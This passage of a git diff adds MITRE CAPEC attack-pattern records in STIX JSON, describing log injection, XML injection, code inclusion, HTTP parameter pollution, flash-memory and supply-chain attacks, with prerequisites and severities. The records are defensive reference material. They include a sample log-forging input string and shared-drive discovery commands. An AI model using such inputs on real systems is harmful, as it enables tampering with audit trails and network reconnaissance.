100644 index 0000000000..3936815113 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--e4a2e6c2-39c4-4441-9343-bae3b026ccd4.json @@ -0,0 +1,91 @@ +{ + "type": "bundle", + "id": "bundle--78d5633d-924e-46f7-ac76-b138c4fe1cc6", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--e4a2e6c2-39c4-4441-9343-bae3b026ccd4", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "Log Injection-Tampering-Forging", + "description": "This attack targets the log files of the target host. The attacker injects, manipulates or forges malicious log entries in the log file, allowing him to mislead a log audit, cover traces of attack, or perform other malicious actions. The target host is not properly controlling log access. As a result tainted data is resulting in the log files leading to a failure in accountability, non-repudiation and incident forensics capability.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/93.html", + "external_id": "CAPEC-93" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/117.html", + "external_id": "CWE-117" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/75.html", + "external_id": "CWE-75" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/150.html", + "external_id": "CWE-150" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/713.html", + "external_id": "CWE-713" + }, + { + "source_name": "reference_from_CAPEC", + "description": "J. Viega, G. McGraw, Building Secure Software, 2002, Addison-Wesley", + "external_id": "REF-131" + }, + { + "source_name": "reference_from_CAPEC", + "description": "A. Muffet, The night the log was forged", + "url": "http://doc.novsu.ac.ru/oreilly/tcpip/puis/ch10_05.htm", + "external_id": "REF-550" + }, + { + "source_name": "reference_from_CAPEC", + "description": "The OWASP Application Security Desk Reference, 2009, The Open Web Application Security Project (OWASP)", + "url": "https://www.owasp.org/index.php/Log_Injection", + "external_id": "REF-551" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Fortify Software, SAMATE - Software Assurance Metrics And Tool Evaluation, 2006--06---22, National Institute of Standards and Technology (NIST)", + "url": "https://samate.nist.gov/SRD/view_testcase.php?tID=1579", + "external_id": "REF-552" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_consequences": { + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_example_instances": [ + "Dave Nielsen and Patrick Breitenbach PayPal Web Services (aka PHP Toolkit) 0.50, and possibly earlier versions, allows remote attackers to enter false payment entries into the log file via HTTP POST requests to ipn_success.php. See also: CVE-2006-0201", + "\n If a user submits the string \"twenty-one\" for val, the following entry is logged:\n INFO: Failed to parse val=twenty-one\n However, if an attacker submits the string\n twenty-one%0a%0aINFO:+User+logged+out%3dbadguy\n the following entry is logged:\n INFO: Failed to parse val=twenty-oneINFO: User logged out=badguy\n Clearly, attackers can use this same mechanism to insert arbitrary log entries.\n " + ], + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The target host is logging the action and data of the user.", + "The target host insufficiently protects access to the logs or logging mechanisms." + ], + "x_capec_skills_required": { + "Low": "This attack can be as simple as adding extra characters to the logged data (e.g. username). Adding entries is typically easier than removing entries.", + "Medium": "A more sophisticated attack can try to defeat the input validation mechanism." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--e4c9eec6-e738-4c94-9cba-01f4cabb3239.json b/capec/attack-pattern/attack-pattern--e4c9eec6-e738-4c94-9cba-01f4cabb3239.json new file mode 100644 index 0000000000..89acafa038 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--e4c9eec6-e738-4c94-9cba-01f4cabb3239.json @@ -0,0 +1,80 @@ +{ + "type": "bundle", + "id": "bundle--d9d7e577-2b74-42ee-b993-913108400a04", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--e4c9eec6-e738-4c94-9cba-01f4cabb3239", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "XML Injection", + "description": "An attacker utilizes crafted XML user-controllable input to probe, attack, and inject data into the XML database, using techniques similar to SQL injection. The user-controllable input can allow for unauthorized viewing of data, bypassing authentication or the front-end application for direct XML database access, and possibly altering database information.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/250.html", + "external_id": "CAPEC-250" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/91.html", + "external_id": "CWE-91" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/74.html", + "external_id": "CWE-74" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html", + "external_id": "CWE-20" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/713.html", + "external_id": "CWE-713" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/707.html", + "external_id": "CWE-707" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Standard", + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Confidentiality": [ + "Gain Privileges", + "Read Data" + ] + }, + "x_capec_example_instances": [ + "Consider an application that uses an XML database to authenticate its users. The application retrieves the user name and password from a request and forms an XPath expression to query the database. An attacker can successfully bypass authentication and login without valid credentials through XPath Injection. This can be achieved by injecting the query to the XML database with XPath syntax that causes the authentication check to fail. Improper validation of user-controllable input and use of a non-parameterized XPath expression enable the attacker to inject an XPath expression that causes authentication bypass." + ], + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "XML queries used to process user input and retrieve information stored in XML documents", + "User-controllable input not properly sanitized" + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_skills_required": { + "Low": "An attacker must have knowledge of XML syntax and constructs in order to successfully leverage XML Injection" + }, + "x_capec_status": "Draft", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--e552d833-acbb-47fc-92a8-5156232cb45e.json b/capec/attack-pattern/attack-pattern--e552d833-acbb-47fc-92a8-5156232cb45e.json new file mode 100644 index 0000000000..ee1b828ad9 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--e552d833-acbb-47fc-92a8-5156232cb45e.json @@ -0,0 +1,46 @@ +{ + "type": "bundle", + "id": "bundle--effc0ee5-4dd2-45eb-b060-a4db78443a14", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--e552d833-acbb-47fc-92a8-5156232cb45e", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-05-01T00:00:00.000Z", + "name": "Code Inclusion", + "description": "An adversary exploits a weakness on the target to force arbitrary code to be retrieved locally or from a remote location and executed. This differs from code injection in that code injection involves the direct inclusion of code while code inclusion involves the addition or replacement of a reference to a code file, which is subsequently loaded by the target and used as part of the code of some application.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/175.html", + "external_id": "CAPEC-175" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/829.html", + "external_id": "CWE-829" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Meta", + "x_capec_example_instances": [ + "One example of this type of attack pattern is PHP file include attacks where the parameter of an include() function is set by a variable that an attacker is able to control. The result is that arbitrary code could be loaded into the PHP application and executed." + ], + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The target application must include external code/libraries that are executed when the application runs and the adversary must be able to influence the specific files that get included.", + "The victim must run the targeted application, possibly using the crafted parameters that the adversary uses to identify the code to include." + ], + "x_capec_resources_required": [ + "The adversary may need the capability to host code modules if they wish their own code files to be included." + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--e55cf19d-be47-487a-acff-69b9f48382c1.json b/capec/attack-pattern/attack-pattern--e55cf19d-be47-487a-acff-69b9f48382c1.json new file mode 100644 index 0000000000..b84bd0238d --- /dev/null +++ b/capec/attack-pattern/attack-pattern--e55cf19d-be47-487a-acff-69b9f48382c1.json @@ -0,0 +1,66 @@ +{ + "type": "bundle", + "id": "bundle--0c134370-5bd3-4794-8d83-0f61fdf487c5", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--e55cf19d-be47-487a-acff-69b9f48382c1", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2015-12-07T00:00:00.000Z", + "name": "Choosing Message Identifier", + "description": "This pattern of attack is defined by the selection of messages distributed over via multicast or public information channels that are intended for another client by determining the parameter value assigned to that client. This attack allows the adversary to gain access to potentially privileged information, and to possibly perpetrate other attacks through the distribution means by impersonation. If the channel/message being manipulated is an input rather than output mechanism for the system, (such as a command bus), this style of attack could be used to change the adversary's identifier to more a privileged one.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/12.html", + "external_id": "CAPEC-12" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/201.html", + "external_id": "CWE-201" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/306.html", + "external_id": "CWE-306" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Standard", + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Confidentiality": [ + "Read Data", + "Gain Privileges" + ] + }, + "x_capec_example_instances": [ + "A certain B2B interface on a large application codes for messages passed over an MQSeries queue, on a single \"Partners\" channel. Messages on that channel code for their client destination based on a partner_ID field, held by each message. That field is a simple integer. Attackers having access to that channel, perhaps a particularly nosey partner, can simply choose to store messages of another partner's ID and read them as they desire. Note that authentication does not prevent a partner from leveraging this attack on other partners. It simply disallows Attackers without partner status from conducting this attack." + ], + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "Information and client-sensitive (and client-specific) data must be present through a distribution channel available to all users.", + "Distribution means must code (through channel, message identifiers, or convention) message destination in a manner visible within the distribution means itself (such as a control channel) or in the messages themselves." + ], + "x_capec_resources_required": [ + "The Attacker needs the ability to control source code or application configuration responsible for selecting which message/channel id is absorbed from the public distribution means." + ], + "x_capec_skills_required": { + "Low": "All the attacker needs to discover is the format of the messages on the channel/distribution means and the particular identifier used within the messages." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--e5addfc2-59ad-479e-babc-715603b5eeb8.json b/capec/attack-pattern/attack-pattern--e5addfc2-59ad-479e-babc-715603b5eeb8.json new file mode 100644 index 0000000000..1b33e8e823 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--e5addfc2-59ad-479e-babc-715603b5eeb8.json @@ -0,0 +1,34 @@ +{ + "type": "bundle", + "id": "bundle--236f8820-72b4-4386-812c-2bf1237c2ccb", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--e5addfc2-59ad-479e-babc-715603b5eeb8", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2014-06-23T00:00:00.000Z", + "name": "Bypassing Physical Security", + "description": "Facilities often used layered models for physical security such as traditional locks, Electronic-based card entry systems, coupled with physical alarms. Hardware security mechanisms range from the use of computer case and cable locks as well as RFID tags for tracking computer assets. This layered approach makes it difficult for random physical security breaches to go unnoticed, but is less effective at stopping deliberate and carefully planned break-ins. Avoiding detection begins with evading building security and surveillance and methods for bypassing the electronic or physical locks which secure entry points.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/390.html", + "external_id": "CAPEC-390" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Stuart McClure, Joel Scambray, George Kurtz, Hacking Exposed: Network Security Secrets & Solutions (6th Edition), 2009, McGraw Hill", + "external_id": "REF-33" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Meta", + "x_capec_status": "Draft", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--e5e48594-19dd-440e-bd67-fd6d7ec32285.json b/capec/attack-pattern/attack-pattern--e5e48594-19dd-440e-bd67-fd6d7ec32285.json new file mode 100644 index 0000000000..6dcbddf753 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--e5e48594-19dd-440e-bd67-fd6d7ec32285.json @@ -0,0 +1,39 @@ +{ + "type": "bundle", + "id": "bundle--602139cc-5e7a-489d-9a37-956463148771", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--e5e48594-19dd-440e-bd67-fd6d7ec32285", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2014-06-23T00:00:00.000Z", + "name": "Flash Memory Attacks", + "description": "An attacker inserts malicious logic into a product or technology via flashing the on-board memory with a code-base that contains malicious logic. Various attacks exist against the integrity of flash memory, the most direct being rootkits coded into the BIOS or chipset of a device. Such attacks are very difficult to detect because the malicious code resides outside the filesystem or RAM, and in the underlying byte-code that drives the processor. Many devices, such as the recent attacks against digital picture frames, contain only a microprocessor and a small amount of solid-state memory, rendering these devices ideal for \"flash\" based malware or malicious logic. One of the pernicious characteristics of flash memory based attacks is that the malicious code can survive even a total format of the hard-drive and reinstallation of the host operating system. Virtually any device which can be integrated into a computer system is susceptible to these attacks. Additionally, any peripheral device which interfaces with the computer bus could extract or sniff confidential data, even on systems employing full-disk encryption. Trojan code placed into a video card's chipset would continue to perform its function irrespective of the host operating system, and would be invisible to all known antivirus. The threats extend to consumer products such as camcorders, digital cameras, or any consumer electronic device with an embedded microcontroller.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/458.html", + "external_id": "CAPEC-458" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Information Technology Laboratory, Supply Chain Risk Management (SCRM), 2010, National Institute of Standards and Technology (NIST)", + "external_id": "REF-379" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Robert Lemos, Researchers: Rootkits headed for BIOS, 2006, SecurityFocus", + "external_id": "REF-394" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_status": "Draft", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--e6280a4b-a567-415a-800b-6ecb96be15a5.json b/capec/attack-pattern/attack-pattern--e6280a4b-a567-415a-800b-6ecb96be15a5.json new file mode 100644 index 0000000000..07f624806e --- /dev/null +++ b/capec/attack-pattern/attack-pattern--e6280a4b-a567-415a-800b-6ecb96be15a5.json @@ -0,0 +1,41 @@ +{ + "type": "bundle", + "id": "bundle--55fe8ef6-9587-4b3e-b06b-a286b9ce7108", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--e6280a4b-a567-415a-800b-6ecb96be15a5", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "Configuration/Environment Manipulation", + "description": "An attacker manipulates files or settings external to a target application which affect the behavior of that application. For example, many applications use external configuration files and libraries - modification of these entities or otherwise affecting the application's ability to use them would constitute a configuration/environment manipulation attack.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/176.html", + "external_id": "CAPEC-176" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/15.html", + "external_id": "CWE-15" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Meta", + "x_capec_prerequisites": [ + "The target application must consult external files or configuration controls to control its execution. All but the very simplest applications meet this requirement." + ], + "x_capec_resources_required": [ + "The attacker must have the access necessary to affect the files or other environment items the targeted application uses for its operations." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--e6e6beaa-2218-4ec6-8bd7-06ca242bbbe8.json b/capec/attack-pattern/attack-pattern--e6e6beaa-2218-4ec6-8bd7-06ca242bbbe8.json new file mode 100644 index 0000000000..75aa947fd1 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--e6e6beaa-2218-4ec6-8bd7-06ca242bbbe8.json @@ -0,0 +1,54 @@ +{ + "type": "bundle", + "id": "bundle--4d8d8b27-54f3-4a5b-a253-acc5dbff41a8", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--e6e6beaa-2218-4ec6-8bd7-06ca242bbbe8", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "name": "Query System for Information", + "description": "An adversary, aware of an application's location (and possibly authorized to use the application), probes an application's structure and evaluates its robustness by submitting requests and examining responses. Often, this is accomplished by sending variants of expected queries in the hope that these modified queries might return information beyond what the expected set of queries would provide.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/54.html", + "external_id": "CAPEC-54" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/209.html", + "external_id": "CWE-209" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Standard", + "x_capec_consequences": { + "Confidentiality": [ + "Read Data" + ] + }, + "x_capec_example_instances": [ + "Blind SQL injection is an example of this technique, applied to successful exploit. See also: CVE-2006-4705", + "\n Attacker sends bad data at various servlets in a J2EE system, records returned exception stack traces, and maps application functionality.\n In addition, this technique allows attackers to correlate those servlets used with the underlying open source packages (and potentially version numbers) that provide them.\n " + ], + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "This class of attacks does not strictly require authorized access to the application. As Attackers use this attack process to classify, map, and identify vulnerable aspects of an application, it simply requires hypotheses to be verified, interaction with the application, and time to conduct trial-and-error activities." + ], + "x_capec_resources_required": [ + "\n The Attacker needs the ability to probe application functionality and provide it erroneous directives or data without triggering intrusion detection schemes or making enough of an impact on application logging that steps are taken against the attacker.\n The Attack does not need special hardware, software, skills, or access.\n " + ], + "x_capec_skills_required": { + "Medium": "Although fuzzing parameters is not difficult, and often possible with automated fuzzers, interpreting the error conditions and modifying the parameters so as to move further in the process of mapping the application requires detailed knowledge of target platform, the languages and packages used as well as software design." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--e74ee6db-63e0-427c-be03-ae2792d14c82.json b/capec/attack-pattern/attack-pattern--e74ee6db-63e0-427c-be03-ae2792d14c82.json new file mode 100644 index 0000000000..9fffa6f7d1 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--e74ee6db-63e0-427c-be03-ae2792d14c82.json @@ -0,0 +1,55 @@ +{ + "type": "bundle", + "id": "bundle--c971169d-9206-4df0-b59a-97e1d656e7ea", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--e74ee6db-63e0-427c-be03-ae2792d14c82", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2018-07-31T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "Identify Shared Files/Directories on System", + "description": "An adversary discovers connections between systems by exploiting the target system's standard practice of revealing them in searchable, common areas. Through the identification of shared folders/drives between systems, the adversary may further their goals of locating and collecting sensitive information/files, or map potential routes for lateral movement within the network.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/643.html", + "external_id": "CAPEC-643" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/267.html", + "external_id": "CWE-267" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/200.html", + "external_id": "CWE-200" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_consequences": { + "Confidentiality": [ + "Read Data (The adversary is potentially able to identify the location of sensitive information or lateral pathways through the network.)" + ] + }, + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The adversary must have obtained logical access to the system by some means (e.g., via obtained credentials or planting malware on the system)." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_skills_required": { + "Low": "Once the adversary has logical access (which can potentially require high knowledge and skill level), the adversary needs only the capability and facility to navigate the system through the OS graphical user interface or the command line. The adversary, or his malware, can simply employ a set of commands that search for shared drives on the system (e.g., net view \\\\remote system or net share)." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--e762106a-5967-4d6c-9887-c06232b6a8af.json b/capec/attack-pattern/attack-pattern--e762106a-5967-4d6c-9887-c06232b6a8af.json new file mode 100644 index 0000000000..d2a81e5b06 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--e762106a-5967-4d6c-9887-c06232b6a8af.json @@ -0,0 +1,45 @@ +{ + "type": "bundle", + "id": "bundle--9ba2dbf5-0066-45d9-ba5d-77cdd9465395", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--e762106a-5967-4d6c-9887-c06232b6a8af", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "name": "Infected Software", + "description": "An adversary adds malicious logic, often in the form of a computer virus, to otherwise benign software. This logic is often hidden from the user of the software and works behind the scenes to achieve negative impacts. Many times, the malicious logic is inserted into empty space between legitimate code, and is then called when the software is executed. This pattern of attack focuses on software already fielded and used in operation as opposed to software that is still under development and part of the supply chain.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/442.html", + "external_id": "CAPEC-442" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Marshall Brain, How Computer Viruses Work, 2007, MindPride", + "url": "http://www.mindpride.net/root/Extras/how-stuff-works/how_computer_viruses_work.htm", + "external_id": "REF-387" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Standard", + "x_capec_consequences": { + "Authorization": [ + "Execute Unauthorized Commands" + ] + }, + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "Access to the software currently deployed at a victim location. This access is often obtained by leveraging another attack pattern to gain permissions that the adversary wouldn't normally have." + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--e7ba9615-51da-4376-b3b1-3f98ec19223a.json b/capec/attack-pattern/attack-pattern--e7ba9615-51da-4376-b3b1-3f98ec19223a.json new file mode 100644 index 0000000000..7c65acf285 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--e7ba9615-51da-4376-b3b1-3f98ec19223a.json @@ -0,0 +1,46 @@ +{ + "type": "bundle", + "id": "bundle--ce0c8bd9-0efd-4207-b044-f805d8ccdb11", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--e7ba9615-51da-4376-b3b1-3f98ec19223a", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2015-11-09T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "name": "Cellular Traffic Intercept", + "description": "Cellular traffic for voice and data from mobile devices and retransmission devices can be intercepted via numerous methods. Malicious actors can deploy their own cellular tower equipment and intercept cellular traffic surreptitiously. Additionally, government agencies of adversaries and malicious actors can intercept cellular traffic via the telecommunications backbone over which mobile traffic is transmitted.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/609.html", + "external_id": "CAPEC-609" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/311.html", + "external_id": "CWE-311" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_consequences": { + "Confidentiality": [ + "Read Data (Capture all cellular and RF traffic from mobile and retransmission devices. Move bulk traffic capture to storage area for cryptanalysis of encrypted traffic, and telemetry analysis of non-encrypted data. (packet headers, cellular power data, signal strength, etc.))" + ] + }, + "x_capec_prerequisites": [ + "None" + ], + "x_capec_skills_required": { + "Medium": "Adversaries can purchase hardware and software solutions, or create their own solutions, to capture/intercept cellular radio traffic. The cost of a basic Base Transceiver Station (BTS) to broadcast to local mobile cellular radios in mobile devices has dropped to very affordable costs. The ability of commercial cellular providers to monitor for \"rogue\" BTS stations is poor in many areas and it is assumed that \"rogue\" BTS stations exist in urban areas." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--e82e645e-bd7d-477e-b731-8aa85a70b632.json b/capec/attack-pattern/attack-pattern--e82e645e-bd7d-477e-b731-8aa85a70b632.json new file mode 100644 index 0000000000..f259901940 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--e82e645e-bd7d-477e-b731-8aa85a70b632.json @@ -0,0 +1,57 @@ +{ + "type": "bundle", + "id": "bundle--234abf44-68d0-4b8b-8130-ecedc2d0d27d", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--e82e645e-bd7d-477e-b731-8aa85a70b632", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2014-06-23T00:00:00.000Z", + "name": "HTTP Parameter Pollution (HPP)", + "description": "An attacker overrides or adds HTTP GET/POST parameters by injecting query string delimiters. Via HPP it may be possible to override existing hardcoded HTTP parameters, modify the application behaviors, access and, potentially exploit, uncontrollable variables, and bypass input validation checkpoints and WAF rules.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/460.html", + "external_id": "CAPEC-460" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/88.html", + "external_id": "CWE-88" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/147.html", + "external_id": "CWE-147" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/235.html", + "external_id": "CWE-235" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Luca Carettoni, Stefano di Paola, HTTP Parameter Pollution (OWASP EU09 Poland), 2008, The Open Web Application Security Project (OWASP)", + "url": "https://www.owasp.org/images/b/ba/AppsecEU09_CarettoniDiPaola_v0.8.pdf", + "external_id": "REF-397" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_prerequisites": [ + "HTTP protocol is used with some GET/POST parameters passed" + ], + "x_capec_resources_required": [ + "Any tool that enables intercepting and tampering with HTTP requests" + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--e8fc36a2-3fa6-4dda-a8b2-5354d189e4c1.json b/capec/attack-pattern/attack-pattern--e8fc36a2-3fa6-4dda-a8b2-5354d189e4c1.json new file mode 100644 index 0000000000..c245ebd8e0 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--e8fc36a2-3fa6-4dda-a8b2-5354d189e4c1.json @@ -0,0 +1,46 @@ +{ + "type": "bundle", + "id": "bundle--37a73c9d-7b50-4a37-898e-1bad1303d3e6", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--e8fc36a2-3fa6-4dda-a8b2-5354d189e4c1", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2015-11-09T00:00:00.000Z", + "name": "Malicious Gray Market Hardware", + "description": "An attacker maliciously alters hardware components that will be sold on the gray market, allowing for victim disruption and compromise when the victim needs replacement hardware components for systems where the parts are no longer in regular supply from original suppliers, or where the hardware components from the attacker seems to be a great benefit from a cost perspective.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/535.html", + "external_id": "CAPEC-535" + }, + { + "source_name": "reference_from_CAPEC", + "description": "John F. Miller, Supply Chain Attack Framework and Attack Patterns, 2013, The MITRE Corporation", + "url": 